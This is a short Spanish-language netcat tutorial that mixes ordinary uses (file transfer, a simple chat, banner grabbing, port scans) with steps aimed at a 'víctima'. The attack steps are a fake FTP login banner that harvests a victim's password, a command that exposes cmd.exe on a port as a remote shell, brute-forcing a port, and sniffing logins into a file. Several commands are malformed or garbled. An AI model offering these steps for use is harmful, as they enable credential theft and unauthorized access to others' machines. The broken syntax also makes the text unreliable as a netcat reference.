NETCAT
INTRODUCCIÓN
Netcat es una utilidad que lee y escribe datos en y desde la red. Al igual que un fichero puede ser escrito o leído de tu máquina local usando el comando cat ( con cat filename > filename2 estaríamos escribiendo el contenido de un fichero en otro, o con cat > filename , estaríamos escribiendo lo tecleado por entrada estándar en un fichero) es posible usar netcat para enviar datos desde la máquina local a una remota, para actuar como servidor de "echo" en un determinado puerto, para redirigir el tráfico de un puerto a otro y para muchas otras cosas.
Comandos básicos
# Parámetros de Netcat: -v : realiza consulta DNS y al DNS inverso
# -n : sólo acepta direcciones IP
# -vv: salida detallada
# -z:Escaneado de puertos
Capturar algunos password
Si la victima por ej. no tiene abierto el puerto de FPT o el de Telnet puedes crear un archivo que solicite la ID y password de la victima, argo asi:
CITA
Microsoft Internet FTP Server V.5.9 [Beta>
04/16/99 myhost.com
Please introduce Username, password and press "Enter" Login
Despues de hacer esto redireccionamos el archivo a la victima asi:
CÓDIGO
C:\nc11nt>nc -v -v -L -p 21 nombre del host -t < login.txt
Tras hacer esto, si la victima cae en el engaño ya tenemos nuestro password.
Ejecutar un shell en máquina remota
CÓDIGO
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe
Estudiar puertos
CÓDIGO
nc -v <IP> <puerto> (puedes añadir otra -v)
Bruteforce en un puerto
CÓDIGO
nc -v <host> 79 < user.txt > log.txt
(envía user.txt y guarda la respuesta en log.txt)
Scanner de puertos en localhost (rango 1-53)
CÓDIGO
nc -v -v -z 127.0.0.1 1-53
Sniffer en pantalla
CÓDIGO
nc -v -v -L 127.0.0.1 -p 23
Sniffer en un log
CÓDIGO
nc -v -v -L -p 23 127.0.0.1 -t >login.txt
Conexiones no autorizadas en un puerto
CÓDIGO
nc -u -v -v -L -p 31337 127.0.0.1 31337
Mandar un archivo a víctima
CÓDIGO
nc -v -v -L -p 21 nombre del host -t < login.txt
Pasar ficheros
La máquina que recibe los datos debe estar así:
CÓDIGO
nc -l -p 6000 |tar xvfj -
La máquina que envía los datos debe estar así:
CÓDIGO
tar cvfj - directorio/ | nc IP_MaquinaQueRecibe 6000
Montar un chat
La máquina que recibe los datos debe estar así:
CÓDIGO
nc -l -p 5777
La máquina que envía los datos debe estar así:
CÓDIGO
nc IP_MáquinaQueRecibe 5777
De esta forma podrás escribir en la conexión que envía, al pulsar el enter lo recibe la máquina que se mantiene a la escucha. Para que cada máquina pueda recibir y enviar deben tener abiertas dos consolas, una recibiendo y otra enviando.
Averiguar servidor
CÓDIGO
nc -v -v IP_Máquina 80
Para saber que servidor esta funcionando en un determiado puerto de un servidor, es muy útil para saber el nombre y servidor del servidor http o ftp ...
Sacar información de un cliente
CÓDIGO
nc -v -v -l -p 80
Cuando un cliente se conecte a un ordenar que esté en escucha de esta forma, sacará información de la ip, browser y Sistema Operativo.
tutorial hecho por un amigo DEMONY WARRIO.
